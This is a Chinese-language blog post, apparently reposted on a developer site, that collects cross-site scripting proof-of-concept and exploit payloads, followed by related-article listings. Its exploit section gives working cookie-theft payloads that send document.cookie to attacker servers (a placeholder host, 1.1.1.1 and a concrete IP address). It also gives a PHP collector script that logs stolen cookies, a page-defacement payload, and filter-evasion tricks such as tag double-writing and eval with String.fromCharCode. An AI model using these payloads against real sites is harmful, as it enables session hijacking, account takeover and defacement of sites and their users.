XSS漏洞的poc与exp

最新推荐文章于 2024-03-28 16:53:34 发布
最新推荐文章于 2024-03-28 16:53:34 发布
阅读量886 收藏 1
点赞数 2
文章标签: python php javascript ViewUI
原文链接:http://www.cnblogs.com/-chenxs/p/11441672.html
版权

poc

  • <script>alert('xss')</script>  最简单常用的poc
  • <a href='' οnclick=alert('xss')>type</a> 页面出现一个按钮type,点击触发onclick,然后执行弹窗
  • <img src=http://1.1.1.1/a.ipg οnerrοr=alert('xss')> 加载图片,给一个错误的图片地址,错误则执行弹窗
  • <script>window.location=‘http://1.1.1.1'</script> 重定向到指定的url地址
  • <iframe SRC="http://1.1.1.1/victim" height = "0" width ="0"></iframe> 
  • " οnmοuseοver=alert(document.domain)%0a    闭合属性,构造on事件

exp

  • <script>document.body.innerHTML="<div style=visibility:visible;><h1>THIS
    WEBSITE IS UNDER ATTACK</h1></div>";</script>

    • 篡改页面,将页面篡改为<h1></h1>里面显示的文字

  • <script>new Image().src="http://yourhost/getcookie.php?
    cookie="+document.cookie;</script>

    • 将别人登录的cookie信息捕获到自己的服务器上
    • 自己的服务器上编写一个接收cookie信息的php脚本getcookie.php
    • 此脚本将接收到的cookie信息写入到自动创建的txt文本cookie.txt里面
  • <script>document.location='http://47.99.184.173/getcookie.php?cookie='+document.cookie;</script>
    • 与上一个获取cookie信息的payload相似,相当于这是第二种获取cookie信息的exp
  • <script src=http://1.1.1.1/a.js></script>
    • 自己服务器上a,js的源码为:
    • var img = new Image();
img.src = "http://1.1.1.1/cookies.php?cookie="+document.cookie;
    • 获取cookie信息的第三种方式,这种方式的payload比较简短,便于很好的利用。
    • 这种间接的方式,可以适用于所有的exp,将攻击代码放在服务器上的一个js文件里面,然后再漏洞点利用<script>访问

附上一个简短的getcookie.php脚本

<?php
$cookie = $_GET['cookie'];
$log = fopen("cookie.txt", "w");
fwrite($log, $cookie ."\n");
fclose($log);
?>

 绕过方法

  • 利用js双写或者大些小绕过:<scscriptript>alert(1)</scrscriptipt>
  • 利用input弹窗 
    ' οninput=alert`1` //
' οninput=alert`1` '
' οnchange=alert`1` //
' οnchange=alert`1` '

  • 利用链接弹窗(a标签)<a href="javascript:alert(1)">click me</a> //

  1. 转义字符:将xss语句转换为含有“\”16进制或者8进制
  2. UBB标签:UBB标签是目前广泛运用到论坛,留言簿,以及其他网站系统的一种编码标签,类似[img]url[/img]这样的,用户在中间输入地址后即可,在发表的时候系统会自动改成<img src=”url”></img>。这个URL就是用户输入的图片地址,XSS攻击中,可以利用这个特点来达到无需用户输入<>就能执行由用户所输入的代码,我们只要在输入网址的地方输入: 
    x"/**/οnerrοr="alert('poruin')

    • 那么经过转换后就变成了<img src="x"/**/οnerrοr="alert('poruin')"></img>

      在JS中空格可以用/**/转换,如图:

 

 

3.JS还原函数

JS中的编码还原函数最常用的就是String.fromCharCode了,这个函数用于ascii码的还原,一般来说,这个函数都要配合EVAL来使用才有效果。

在跨站中,String.fromCharCode主要是使到一些已经被列入黑名单的关键字或语句安全通过检测,把关键字或语句转换成为ASCII码,然后再用String.fromCharCode还原,因为大多数的过滤系统都不会把String.fromCharCode加以过滤,例如关键字alert被过滤掉,那就可以这么利用:

<img src="x"/**/οnerrοr="eval(String.fromCharCode(97,108,101,114,116,40,39,112,111,114,117,105,110,39,41))"></img>

 

XSS过滤绕过速查表:https://www.freebuf.com/articles/web/153055.html

  

  

转载于:https://www.cnblogs.com/-chenxs/p/11441672.html

bamanju0574
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
XSS跨站脚本攻击(内含poc)----自用笔记
weixin_59114667的博客
02-22 280
仅仅是自已用,无别的想法(doge)
JSP使用过滤器防止Xss漏洞
10-17
在Web开发中,XSS(Cross-site scripting)漏洞是一种常见的安全威胁,允许攻击者通过注入恶意脚本到网页中,从而影响用户浏览器的行为。JSP(JavaServer Pages)作为常用的服务器端动态网页技术,同样需要关注XSS...
xss poc
cnbird's blog
03-15 764
Ajax Worm - Proof of Concept http://myappsecurity.blogspot.com/2006/12/ajax-worm-proof-of-concept.html Ajax Sniffer - Prrof of concept http://myappsecurity.blogspot.com/2007/01/ajax-sniffer-pr
xss 常用语句
最新发布
柳岸花又明的博客
03-28 390
iframe srcdoc=""> --弹ip。 //引用外部的xss。 //弹cookie。 --反射型。
XSS POC
qq_43616736的博客
07-28 1931
xss xss 作为owasp top 10 之一, xss 被称为跨站脚本攻击 xss 危害: 1.盗取各种用户帐号 2.窃取用户cookie资料,冒充用户身份进入网站 3.劫持用户会话,执行任意操作 4.刷流量,执行弹窗广告 5.传播蠕虫病毒 xss漏洞发生在 ...
xss漏洞pocexp
zhangge3663的博客
04-13 1476
POC <script>alert('xss')</script> 最简单常用的poc "><script>alert(1)<script> <a href=" onclick=alert('xss')>type</a> 页面出现一个按钮type,点击触发onclick,然后执行弹窗。 <img src=http://1.1.1.1/a.jpg onerror=alert('xss')> 加载图片,给...
由于IE对URL编码问题处理不当带来的XSSPoC
公众号shadow sock7
06-11 1028
参考: https://web.archive.org/web/20131107024350/http://blackfan.ru/SourceRequestURI: <%= request.getRequestURI() %> Host: <%= request.getServerName() %> Port: <%= request.getLocalPort() %>PoC (all ve
XSS漏洞挖掘与安全防护.pdf
08-08
XSS相关漏洞一直是无法忽略的问题,即使再好的开发工程师也避免不了写出”不安全”的代码,这次议题将深入浅出的介绍一下XSS漏洞形成与危害。
XSS漏洞挖掘与安全防护.pptx
04-06
XSS漏洞挖掘与安全防护,
常见Exp漏洞POC集合
01-21
该资源为bugscan收集的漏洞poc,喜欢的可以下载下来看看,有需要其他资源的也可以发邮件与我交流shulanyy@gmail.com,作为爱好他是免费的。
Moodle-CVE-2019-3810:Moodle(<3.6.2,<3.5.4,<3.4.7,<3.1.16)XSS PoC,用于特权升级(学生为管理员)
05-13
面条CVE-2019-3810 Moodle(<3.6.2,<3.5.4,<3.4.7,<3.1.16)用于特权升级的XSS PoC(学生为管理员)。 这是我在过去的一次高校考试中发现的过去的错误之一。 当时,它已经足够成功,几乎仅使用一个简单的bug即可窃取管理员访问权限并获得对Moodle的完全控制。 从可以看出,该错误自Moodle(2003)的旧版本以来一直存在,并。 时间线: 2018年12月-向Moodle报告了该错误 2019年1月-补丁发布 2021年4月-PoC披露 警告 仅用于教育目的。 请勿将EXPLOIT用于非法活动。 作者不对任何滥用或损坏负责。 PoC 将上载到pastebin或其他类似服务。 将userid的值更改为您自己的id。 假设网址为https://pastebin.com/raw/xxxxxxxx 。 登录到您的学生帐户。 用" sty
uxss-poc:具有多个目标站点的通用 xss PoC (CVE-2015-0072)
06-23
通用跨站脚本PoC 这是 CVE-2015-0072 的 PoC,用于顺序获取目标网站 cookie。 免责声明 此概念证明仅用于教育目的。 未经事先许可,请勿将其用于任何系统。 您应对自己使用此代码执行的操作负责。 改进 为了使漏洞利用工作,第一帧位置内的javascript注入必须发生在第二帧重定向之后。 在另一个 PoC 中提出的第一个解决方案部署了睡眠和超时​​。 但是,如果服务器同步重定向和睡眠请求,则可以在不睡眠的情况下利用该漏洞。 其实有一点setTimeout,但是500 ms比之前的5000有了很大的进步! 注意:此代码是一个 PoC,它从未在我的测试环境之外进行过测试。 用法 npm install node app.js 用于基本日志记录启动 node app.js > cookies.txt 配置 在conf.json ,将host设置为公共主机的值,并将t
HTML5 JQuery POC
11-23
HTML5 JQuery POC HTML5 JQuery POC
用python写注入漏洞poc
weixin_30552811的博客
04-30 404
webug靶场一道简单的注入题 加点后报错 could not to the database You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line...
POC编写基础————2、POC编写技能需求
Fly_鹏程万里
02-27 2889
前言 本小节主要为大家简单的介绍一些在编写POC时需要的基本技能。 网络通信原理 因为我们的POC是针对网络当中的一些应用程序当中是否存在漏洞进行验证的,那么我们就有必要深入了解基本的网络通信原理,例如:数据的请求与应答过程。同时我们也有必要了解一些基本的网络术语,例如:IP地址、域名(二级域名、三级域名等)、端口、TCP原理、HTTP协议、socket编程通信等等的内容,这一点不仅在您复现...
python DVWAXSSPOC练习
weixin_56537388的博客
09-10 285
【代码】python DVWAXSSPOC练习。
python3基础学习(http host头攻击漏洞POC
weixin_33682719的博客
11-12 484
  简单版http host头攻击漏洞POC,没有对异常进行处理,没有对意外情况进行处理,所以是简单版!代码如下: from urllib import request import sys import re url=sys.argv[1] header={'Host' : 'www.eth10.com'} req=request.Request(u...
请写一段xss漏洞poc请求包
05-30
为了防止伦理问题和网络安全问题,我不能为你提供一个真正的XSS漏洞POC请求包。但是,我可以告诉你一个基本的XSS漏洞POC请求包的结构,供你参考: ``` POST /search HTTP/1.1 Host: example.com Content-Type: ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值